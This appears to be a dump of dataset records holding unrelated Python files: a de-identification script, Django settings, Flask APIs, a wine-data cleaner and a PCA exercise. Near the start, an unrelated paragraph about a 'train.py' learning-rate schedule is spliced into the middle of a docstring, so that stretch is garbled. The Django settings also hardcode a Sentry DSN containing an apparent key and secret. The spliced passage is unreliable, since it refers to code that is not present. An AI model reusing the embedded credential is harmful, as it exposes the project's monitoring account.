\"\"\"\n Replace a particular element in the JSON data with the MD5 hexdigest\n\n :param key: key of the item 
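train.py's learning rate above comes from `tf.train.exponential_decay` with `staircase=True`, i.e. lr(step) = lr0 * decay_rate^floor(step/decay_step). The same schedule in plain Python, using the flag defaults defined above, is handy for sanity-checking:

```python
def staircase_lr(step, lr0=1e-3, decay_rate=0.65, decay_step=8000):
    """lr0 * decay_rate ** (step // decay_step): staircase exponential decay."""
    return lr0 * decay_rate ** (step // decay_step)

for step in (0, 7999, 8000, 16000, 24000):
    print(step, staircase_lr(step))
# steps 0..7999 stay at 1e-3; each further 8000 steps multiplies the rate by 0.65
```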
being hashed\n :param value: value found in the submission\n :return: hexdigest of hashed value\n \"\"\"\n if not isinstance(value, str):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n if not value:\n return value\n return hashlib.md5(value.encode('ascii', 'xmlcharrefreplace')).hexdigest()\n\n\n# Dict of submission items containing PII in the following format:\n# 'item_key': [is_required, None | deidentify_method | nested_items_dict, alternate_item]\ndeidentify_items = {\n 'addressentity': [True, {\n 'address_line_1': [False, sha256hash],\n 'address_line_2': [False, sha256hash],\n 'address_line_3': [False, sha256hash],\n 'contact_email': [False, md5hash]\n }, 'internationaladdressentity'],\n 'filers': [True, None],\n 'proceedings': [True, validate],\n 'text_data': [False, None],\n 'text_data_docs': [False, None],\n 'internationaladdressentity': [False, {\n 'addresstext': [False, sha256hash]\n }],\n 'contact_email': [False, md5hash]\n}\n\n\ndef deidentify(comment, attributes=None):\n if attributes is None:\n attributes = deidentify_items\n for key, value in attributes.items():\n if key in comment:\n value = value[1]\n if value is None:\n del comment[key]\n elif isinstance(value, dict):\n if not isinstance(comment[key], dict):\n raise ValueError('invalid \"{}\": \"{}\"'.format(key, str(value)))\n deidentify(comment[key], attributes=value)\n elif isinstance(value, str):\n comment[key] = value\n else:\n comment[key] = value(key, comment[key])\n elif value[0]:\n if len(value) != 3 or value[2] not in comment:\n raise ValueError('missing \"{}\": {}'.format(key, json.dumps(comment, indent=4)))\n\n\nif __name__ == '__main__':\n print('starting...')\n outfile = sys.stdout\n for src_path in glob.glob('./FCC-SPAM-ECFS/ECFS_17-108_*/*.json'):\n with open(src_path) as src_file:\n sys.stdout.write(os.path.basename(src_path))\n dst_path = os.path.join('.', 'deidentified', os.path.basename(src_path))\n if os.path.exists(dst_path):\n sys.stdout.write(' [skipped]\\n')\n continue\n with open(dst_path, 'w') as dst_file:\n outfile = dst_file\n outfile.write('[\\n')\n separator = ''\n for i, comment in enumerate(json.load(src_file)):\n if i % 100 == 0:\n sys.stdout.write('.')\n sys.stdout.flush()\n try:\n deidentify(comment)\n outfile.write(separator + json.dumps(comment, indent=4))\n separator = ',\\n'\n except Exception as exc:\n sys.stderr.write('{}: {}\\n'.format(comment['id_submission'], exc))\n outfile.write('\\n]\\n')\n sys.stdout.write(' [done]\\n')\n","sub_path":"scripts/deidentify.py","file_name":"deidentify.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"386604219","text":"# Django settings for qsic3 project.\nimport os\n\nimport dj_database_url\nfrom easy_thumbnails.conf import Settings as thumbnail_settings\n\n\ndef get_env_var(env_var, default=None, isbool=False):\n \"\"\"\n Return value of envirnoment variable or throw exception\n \"\"\"\n from django.core.exceptions import ImproperlyConfigured\n try:\n env_value = os.environ.get(env_var, default)\n if isbool:\n env_value = 'true' in str(env_value).lower().strip()\n return env_value\n except KeyError:\n error_msg = '{} environment variable not set'.format(env_var)\n raise ImproperlyConfigured(error_msg)\n\n# Return directory name containing file depth levels deep\ndirname = lambda file, depth: os.path.dirname(dirname(file, depth-1)) if depth else file\nPROJECT_ROOT = os.path.abspath(dirname(__file__, 3))\nrootjoin = lambda 
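The spec-driven walker in deidentify.py is easiest to see on a toy submission. Assuming `deidentify` and its helpers from the script above are in scope, a fabricated comment (all values invented for illustration) comes out with the free-text items dropped and the address fields hashed:

```python
# Fabricated submission; field names follow the deidentify_items spec above.
comment = {
    'proceedings': [{'name': '17-108'}],
    'filers': [{'name': 'Jane Doe'}],
    'addressentity': {'address_line_1': '1 Example St',
                      'contact_email': 'jane@example.com'},
    'text_data': 'free-form comment text',
}
deidentify(comment)
print(json.dumps(comment, indent=4))
# 'filers' and 'text_data' are removed; address_line_1 becomes a SHA-256
# hex digest and contact_email an MD5 hex digest
```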
*args: os.path.join(PROJECT_ROOT, *args)\n\nDEBUG = get_env_var('DJANGO_DEBUG', default=False, isbool=True)\nTEMPLATE_DEBUG = DEBUG\nTHUMBNAIL_DEBUG = DEBUG\n\nDATABASE_URL = get_env_var('DATABASE_URL')\nDATABASES = {\n 'default': dj_database_url.config()\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = ['*']\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/New_York'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-i\n# dentifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\nUSE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Filesystem directory names for static and media files\nSTATIC_DIR = 'static'\nMEDIA_DIR = 'media'\n\n# AWS file access info\nAWS_ACCESS_KEY_ID = get_env_var('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = get_env_var('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = get_env_var('AWS_STORAGE_BUCKET_NAME')\n\n# Of the format: '//bucket_name.s3.amazonaws.com/[media|static]/'\nAWS_S3_BUCKET_URL = '//%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\n\n# Encoding for AWS transactions\nENCODING = 'utf-8'\n\n# Serve static from AWS\n# tell django to use django-storages\nSTATICFILES_STORAGE = 'django_py3s3.storages.S3StaticStorage'\nSTATIC_ROOT = AWS_S3_BUCKET_URL + '/' + STATIC_DIR + '/'\nSTATIC_URL = STATIC_ROOT\n\n# Serve media from AWS\nMEDIA_ROOT = AWS_S3_BUCKET_URL + '/' + MEDIA_DIR + '/'\nMEDIA_URL = MEDIA_ROOT\nDEFAULT_FILE_STORAGE = 'django_py3s3.storages.S3MediaStorage'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n rootjoin('static'),\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n # 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'project_settings.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'project_settings.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not 
relative paths.\n rootjoin('templates'),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'django_extensions',\n 'easy_thumbnails',\n 'image_cropping',\n 'core',\n 'events',\n 'groups',\n 'performers',\n 'py3s3',\n 'raven.contrib.django.raven_compat',\n)\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = get_env_var('DJANGO_SECRET_KEY')\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n\n 'medium': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n },\n\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'medium'\n }\n },\n\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n}\n\n\n# easy_thumbnails and django image cropping\nTHUMBNAIL_PROCESSORS = (\n 'image_cropping.thumbnail_processors.crop_corners',\n) + thumbnail_settings.THUMBNAIL_PROCESSORS\n\n#THUMBNAIL_DEFAULT_STORAGE = 'easy_thumbnails.storage.ThumbnailFileSystemStorage'\nTHUMBNAIL_DEFAULT_STORAGE = DEFAULT_FILE_STORAGE\n\nIMAGE_CROPPING_SIZE_WARNING = True\n\nSOUTH_MIGRATION_MODULES = {\n 'easy_thumbnails': 'easy_thumbnails.south_migrations',\n}\n\n# Set your DSN value\nRAVEN_CONFIG = {\n 'dsn': 'https://e92ff3ac19cd4d89945f1b5e428f061d:accc3dfff4044ffa9193e79a564c9175@app.getsentry.com/34299',\n}","sub_path":"project_settings/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"311034107","text":"from flask import Blueprint, request, jsonify\nfrom meuBarFavorito.infraestructure.DbAccess import commit, salvar, deletar, abortComErro\nfrom meuBarFavorito.infraestructure.DbAccess import getEstabelecimento, getEvento, getEventoPorPartida, getFoto, getListaDeFotosDoEstabelecimento, getPartida\nfrom meuBarFavorito.models.Evento import Evento\nfrom meuBarFavorito.models.Partida import Partida\nfrom meuBarFavorito.models.Estabelecimento import Estabelecimento\nfrom meuBarFavorito.models.Foto import Foto\nfrom meuBarFavorito.app import db\nfrom meuBarFavorito.views.login import token_required\n\nbpevento = Blueprint('bpevento', __name__)\n\n@bpevento.route('/evento', methods=['POST'])\n@token_required\ndef postEvento(estabelecimentoAtual):\n data = 
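One caveat in the settings module above: `os.environ.get(env_var, default)` never raises `KeyError`, so `get_env_var`'s `ImproperlyConfigured` branch can never fire and a missing `DJANGO_SECRET_KEY` silently becomes `None`. A variant that actually enforces required variables (the name and behavior are my suggestion, not the project's code):

```python
import os
from django.core.exceptions import ImproperlyConfigured

def require_env_var(env_var, default=None, isbool=False):
    """Like get_env_var above, but the error branch is reachable:
    raise when the variable is unset and no default was supplied."""
    if default is None and env_var not in os.environ:
        raise ImproperlyConfigured('{} environment variable not set'.format(env_var))
    env_value = os.environ.get(env_var, default)
    if isbool:
        env_value = 'true' in str(env_value).lower().strip()
    return env_value
```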
request.get_json()\n\n idEstabelecimento = estabelecimentoAtual.id\n\n verificarEventoRepetido(idEstabelecimento, data['idPartida'])\n \n cadastrarEvento(\n idEstabelecimento = idEstabelecimento, \n idPartida = data['idPartida'], \n horaInicio = data['horaInicio'], \n horaFim = data['horaFim'], \n descricao = data['descricao']\n )\n\n return jsonify({'code': 200, 'body': {'mensagem': 'Evento cadastrado com sucesso!'}}), 200\n\n@bpevento.route('/evento', methods=['GET'])\ndef getEventos():\n eventos = Evento.query.all()\n\n eventosCompletos = []\n for evento in eventos:\n partida = getPartida(evento.idPartida)\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n eventoAtual['estadio'] = partida.estadio\n\n eventosCompletos.append(eventoAtual)\n\n return jsonify(eventosCompletos)\n\n@bpevento.route('/evento/<int:id>', methods=['GET'])\ndef getOneEvento(id):\n evento = getEvento(id)\n partida = getPartida(evento.idPartida)\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['visualizacoes'] = evento.visualizacoes\n\n evento.visualizacoes += 1\n db.session.commit()\n\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['descricaoEstabelecimento'] = estabelecimento.descricao\n eventoAtual['email'] = estabelecimento.email\n eventoAtual['telefone'] = estabelecimento.telefone\n eventoAtual['celular'] = estabelecimento.celular\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['cep'] = estabelecimento.cep\n\n fotos = getListaDeFotosDoEstabelecimento(estabelecimento.id)\n\n fotosEvento = []\n for foto in fotos:\n fotosEvento.append(foto.midia)\n \n eventoAtual['fotosEstabelecimento'] = fotosEvento\n\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['estadio'] = partida.estadio\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n\n return jsonify(eventoAtual)\n\n@bpevento.route('/partida/<int:id>/evento', methods=['GET'])\ndef getEventosPorPartida(id):\n partida = getPartida(id)\n eventos = getEventoPorPartida(partida.id)\n\n eventosCompletos = []\n for evento in eventos:\n estabelecimento = getEstabelecimento(evento.idEstabelecimento)\n fotoPerfil = getFoto(estabelecimento.fotoPerfil)\n\n eventoAtual = {}\n eventoAtual['id'] = evento.id\n eventoAtual['nomeEstabelecimento'] = estabelecimento.nome\n eventoAtual['enderecoEstabelecimento'] = estabelecimento.endereco\n eventoAtual['fotoPerfil'] = fotoPerfil.midia\n eventoAtual['nomeMandante'] = partida.nomeMandante\n eventoAtual['escudoMandante'] = partida.escudoMandante\n eventoAtual['nomeVisitante'] = 
partida.nomeVisitante\n eventoAtual['escudoVisitante'] = partida.escudoVisitante\n eventoAtual['data'] = partida.dataHora\n eventoAtual['campeonato'] = partida.campeonato\n eventoAtual['estadio'] = partida.estadio\n\n eventosCompletos.append(eventoAtual)\n\n return jsonify(eventosCompletos)\n\ndef cadastrarEvento(idEstabelecimento, idPartida, horaInicio, horaFim, descricao):\n novoEvento = Evento(idEstabelecimento, idPartida, horaInicio, horaFim, descricao)\n salvar(novoEvento)\n\n return novoEvento\n\ndef verificarEventoRepetido(idEstabelecimento, idPartida):\n checkEventos = Evento.query.filter_by(idEstabelecimento = idEstabelecimento, idPartida = idPartida).first()\n\n if checkEventos is not None:\n abortComErro({'code': 409, 'body': {'mensagem': 'Você já possui um evento desta partida!'}}, 409)","sub_path":"meuBarFavorito/views/cevento.py","file_name":"cevento.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"449411525","text":"from flask import Flask, jsonify, render_template, request\nimport time\nimport numpy as np\nimport json\nimport pandas as pd\nimport pickle\nimport numpy as np\n\napp = Flask(__name__)\n\n# load the model from disk\nfilename = 'workspace/finalized_model.sav'\nloaded_model = pickle.load(open(filename, 'rb'))\n\ndef convertPreChord(p):\n if p[0] == 'C' or p[0] == 'c':\n return 1\n elif p[0] == 'D' or p[0] == 'd':\n return 2\n elif p[0] == 'E' or p[0] == 'e':\n return 3\n elif p[0] == 'F' or p[0] == 'f':\n return 4\n elif p[0] == 'G' or p[0] == 'g':\n return 5\n elif p[0] == 'A' or p[0] == 'a':\n return 6\n elif p[0] == 'B' or p[0] == 'b':\n return 7\n else:\n return 0\n\n@app.route(\"/\")\ndef main():\n return render_template('index.html', reload = time.time())\n\n@app.route(\"/api/convert\")\ndef convert():\n notes = str(request.args.get('notes', ''))\n #print('Notes', notes)\n\n notes = json.loads(notes)\n #print(notes)\n result = \"\"\n pre_chord = 0\n for m in notes:\n #print (m['C'], m['D'], m['E'], m['F'], m['G'], m['A'], m['B'])\n sum = int(m['C']) + int(m['D']) + int(m['E']) + int(m['F'])\\\n + int(m['G']) + int(m['A']) + int(m['B'])\n a = [m['C'], m['D'], m['E'], m['F'], m['G'], m['A'], m['B'], pre_chord]\n numpy_array = np.array([a])\n #print(numpy_array)\n input = pd.DataFrame(data=numpy_array)\n chord = loaded_model.predict(input)\n #print(chord)\n pre_chord = convertPreChord(chord)\n result = result + str(chord[0].lower()) + str(sum) + \" | \"\n result = result[:-3] # trim tail\n #print(result)\n return result\n\napp.run(host='0.0.0.0', port= 8080)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"120025233","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\n# 读取数据\r\ndef readdata():\r\n path1 = './winereviews/winemag-data_first150k.csv'\r\n path2 = './winereviews/winemag-data-130k-v2.csv'\r\n train1 = pd.read_csv(path1)\r\n train2 = pd.read_csv(path2)\r\n return train1, train2\r\n\r\n# 数据摘要\r\ndef data_abstract(train1, train2):\r\n counts1 = train1['country'].value_counts()\r\n print(\"---counts1---\")\r\n print(counts1)\r\n counts2 = train2['country'].value_counts()\r\n print(\"---counts2---\")\r\n print(counts2)\r\n m1 = train1.describe()\r\n 
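The chord service in app.py above reads its payload from a `notes` query parameter holding JSON: a list of per-measure note counts keyed C through B. A hypothetical client call (port from the `app.run` line; the predicted chord letters depend on the pickled model, so the output shown is illustrative):

```python
import json
import requests  # assumed client; the server comes from app.run above

measures = [  # one dict of note counts per measure, keys C..B as in convert()
    {'C': 2, 'D': 0, 'E': 1, 'F': 0, 'G': 1, 'A': 0, 'B': 0},
    {'C': 0, 'D': 1, 'E': 0, 'F': 2, 'G': 0, 'A': 1, 'B': 0},
]
resp = requests.get('http://127.0.0.1:8080/api/convert',
                    params={'notes': json.dumps(measures)})
print(resp.text)  # e.g. 'c4 | f4': predicted chord letter plus the measure's note total
```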
print(\"---m1---\")\r\n print(m1)\r\n n1 = train1.isnull().sum()\r\n print(\"---n1---\")\r\n print(n1)\r\n m2 = train2.describe()\r\n print(\"---m2---\")\r\n print(m2)\r\n n2 = train2.isnull().sum()\r\n print(\"---n2---\")\r\n print(n2)\r\n\r\n# 数据可视化\r\ndef data_visual(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(221)\r\n sns.countplot(train1.price)\r\n # sns.distplot(train1.price)\r\n plt.title('price')\r\n plt.subplot(222)\r\n # plt.figure(figsize=(15,5))\r\n sns.countplot(train1.points)\r\n plt.title('points')\r\n plt.subplot(223)\r\n plt.boxplot(train1.price.dropna())\r\n plt.title('price')\r\n plt.subplot(224)\r\n plt.boxplot(train1.points)\r\n plt.title('points')\r\n plt.show()\r\n\r\n# 剔除缺失部分\r\ndef data_fill_1(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(311)\r\n sns.countplot(train1.price)\r\n plt.title('price_old')\r\n plt.subplot(313)\r\n sns.countplot(train1.price.dropna())\r\n plt.title('price_new')\r\n plt.show()\r\n\r\n# 用最高频率填补缺失值\r\ndef data_fill_2(train1):\r\n plt.figure(figsize=(15, 8))\r\n plt.subplot(221)\r\n sns.countplot(train1.price)\r\n plt.title('price_old')\r\n plt.subplot(222)\r\n sns.countplot(train1.price.fillna(train1['price'].value_counts().index[0]))\r\n plt.title('price_new')\r\n plt.subplot(223)\r\n plt.boxplot(train1.price.dropna())\r\n plt.title('price_old')\r\n plt.subplot(224)\r\n plt.boxplot(train1.price.fillna(train1['price'].value_counts().index[0]))\r\n plt.title('price_new')\r\n plt.show()\r\n\r\n# 通过属性的相关关系来填补缺失值\r\ndef data_fill_3(data1):\r\n data_pred = data1[np.isnan(data1['price'])]\r\n known_price = data1[data1.price.notnull()].values\r\n y = known_price[:, 0] # price\r\n x = known_price[:, 1:] # points\r\n line_reg = LinearRegression()\r\n line_reg.fit(x, y)\r\n data_pred['price'] = line_reg.predict(data_pred['points'].values.reshape(-1, 1))\r\n data1.loc[(data1.price.isnull()), 'price'] = data_pred['price']\r\n print(data1.shape)\r\n print(data1.isnull().sum())\r\n\r\n# 通过数据对象之间的相似性来填补缺失值\r\ndef data_fill_null_4(data):\r\n data_copy = data.copy(deep=True)\r\n data_copy[['points', 'price']] = data_copy[['points', 'price']].replace(0, np.NaN)\r\n # null_index = data_copy.loc[data_copy['price'].isnull(), :].index\r\n imputer = KNNImputer(n_neighbors=3)\r\n data_copy[['points', 'price']] = imputer.fit_transform(data_copy[['points', 'price']])\r\n # print(data_copy.isnull().sum())\r\n # imputer = KNNImputer(n_neighbors=2)\r\n # imputer.fit_transform(data.price)\r\n # sns.countplot(data.price)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train1, train2 = readdata()\r\n data_abstract(train1, train2)\r\n data_visual(train1)\r\n # data_visual(train2)\r\n data_fill_1(train1)\r\n # data_fill_1(train2)\r\n data_fill_2(train1)\r\n # data_fill_2(train2)\r\n data_fill_3(train1[['points', 'price']])\r\n # data_fill_3(train2[['points', 'price']])\r\n data_fill_null_4(train1[['points', 'price']])\r\n # data_fill_null_4(data=train2[['points', 'price']])\r\n\r\n","sub_path":"DataMining/Wine.py","file_name":"Wine.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"128546865","text":"\n\n#calss header\nclass _CINDERELLA():\n\tdef __init__(self,): \n\t\tself.name = \"CINDERELLA\"\n\t\tself.definitions = [u'a girl in a traditional story who was badly treated by her sisters but who met and married a prince', u'someone or something that is given little attention or care, especially less than they deserve: ', u'someone or something, especially a 
 a sports team, that achieves success when people think they are very unlikely to: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cinderella.py","file_name":"_cinderella.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"363874670","text":"# -*- coding:utf-8 -*-\n# python 2\nimport serial\nimport socket\n\nhost = \"192.168.0.9\" # enter your server's hostname here\nport = 49152 # pick any suitable port\n#client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#client.connect((host, port)) # this would connect to the server (TCP only)\n\nser = serial.Serial('/dev/ttyAMA0', 115200, timeout=None)\n\ntry:\n    while True:\n        #line = ser.readline()\n        recv = ser.read(2) #recv is str\n        #print(type(recv))\n        #print(line.rstrip())\n        ####print(recv)\n        #client.send(line.rstrip())\n        #client.send(recv)\n        client.sendto(recv, (host, port))\nfinally:\n    ser.close()\n","sub_path":"raspi/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"401029172","text":"\"\"\"\nFollow the PCA Example with Scikit Learn to complete this question\n\n3a. Apply PCA to the training data from the MNIST dataset above (x_train_mnist).\nPrint the top 30 eigenvalues. [10 marks]\n3b. Plot the cumulative variances captured by the top 30 PCs (plot 30 values in\ntotal, e.g., the cumulative variance for the top 5 PCs is the summation of variance\ncaptured by the top 5 PCs). Also print out the results (30 values). [10 marks]\n3c. Visualise the top 10 eigenvectors as images. Describe what you can observe.\n[10 marks]\n3d. Use the top 10 PCs to reconstruct all the original images as x_train_mnist_approx.\nCompute and print the mean squared error over all images (resulting in a single value).\nShow any 10 pairs of reconstructed and original images. 
[15 marks]\n\"\"\"\nfrom sklearn.decomposition import PCA\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# initial the training / testing data set\nmnist = tf.keras.datasets.mnist\n(x_train_mnist, y_train_mnist), (x_test_mnist, y_test_mnist) = mnist.load_data()\nx_train_mnist, x_test_mnist = x_train_mnist / 255.0, x_test_mnist / 255.0\n\n# shape\nn_train_sample = x_train_mnist.shape[0]\nh, w = x_train_mnist.shape[1], x_train_mnist.shape[2]\nn_feature = h * w\nn_eigenvalue = 30\n\n# reshape x_train into 2 dimension\nx_train_reshape = x_train_mnist.reshape(n_train_sample, n_feature)\n\n# --------------------------------- 3a -----------------------------------\npca = PCA(n_components=n_eigenvalue, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape)\nprint(\"The top 30 eigenvalues are \\n\", pca.explained_variance_)\n\n# --------------------------------- 3b -----------------------------------\nplt.figure(31)\nx_axis = np.linspace(1, 30, num=30, dtype=int)\ncumsum_vars = np.cumsum(pca.explained_variance_)\nplt.plot(x_axis, cumsum_vars)\nplt.xticks(np.arange(1, 31, step=1))\nplt.title('The cumulative variance captured by the top 30 PCs')\nplt.ylabel('Cumulative Variance'), plt.xlabel('The $i^{th}$ top PC')\nplt.grid()\nplt.show()\nprint(\"Their cumulative variances are: \\n\", cumsum_vars)\n\n# --------------------------------- 3c -----------------------------------\nplt.figure(32)\nplt.title('The image of top ten eigenvectors')\nfor i in range(10):\n img = pca.components_[i].reshape((h, w))\n plt.subplot(2, 5, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(img)\n\n# --------------------------------- 3d -----------------------------------\npca = PCA(n_components=10, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape)\nx_train_mnist_approx = pca.transform(x_train_reshape)\nx_reconstruction = pca.inverse_transform(x_train_mnist_approx)\n\n# compute the mean squared error over all images\nmse = (np.subtract(x_train_reshape, x_reconstruction)**2).sum() / n_train_sample/w/h\nprint('The mean squared error over all images is: ', mse)\n\n# plot paired original and reconstructed images\nplt.figure(33, figsize=(8, 20))\nfor i in range(10):\n # plot original\n plt.subplot(10, 2, 2*i+1)\n plt.title('The ' + str(i+1) + 'th original image')\n plt.xticks([])\n plt.yticks([])\n img = x_train_mnist[i]\n plt.imshow(img)\n\n # plot reconstructed\n plt.subplot(10, 2, 2*i+2)\n plt.title('The ' + str(i+1) + 'th reconstructed image')\n plt.xticks([])\n plt.yticks([])\n img = x_reconstruction[i].reshape((h, w))\n plt.imshow(img)\nplt.show(33)\n\n# --------------------------------- 4a -----------------------------------\nmask2, mask5 = y_train_mnist == 2, y_train_mnist == 5\nmask = mask2 | mask5\nx_train_dig2, y_train_dig2 = x_train_mnist[mask], y_train_mnist[mask]\nn_train_dig2 = x_train_dig2.shape[0]\nh2, w2 = x_train_dig2.shape[1], x_train_dig2.shape[2]\nx_train_reshape_dig2 = x_train_dig2.reshape((n_train_dig2, h2*w2))\n\npca2 = PCA(n_components=10, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape_dig2)\n\nplt.figure(41)\nfor i in range(10):\n img = pca2.components_[i].reshape((h2, w2))\n plt.subplot(2, 5, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(img)\nplt.show()\n\n# --------------------------------- 4b -----------------------------------\nmask22, mask55 = y_train_dig2 == 2, y_train_dig2 == 5\npca3 = PCA(n_components=2, svd_solver='randomized', whiten=True)\\\n .fit(x_train_reshape_dig2)\nx_train_dig2_approx = 
